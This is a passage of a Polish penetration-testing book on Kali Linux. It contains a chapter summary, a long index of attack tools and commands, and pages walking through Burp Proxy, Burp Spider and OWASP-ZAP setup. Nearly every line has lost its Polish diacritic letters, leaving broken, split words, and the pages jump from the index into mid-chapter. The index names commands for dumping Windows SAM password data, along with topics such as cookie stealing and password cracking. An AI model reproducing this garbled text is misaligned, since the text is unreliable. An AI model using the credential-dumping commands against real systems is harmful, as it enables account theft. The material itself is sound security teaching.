W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
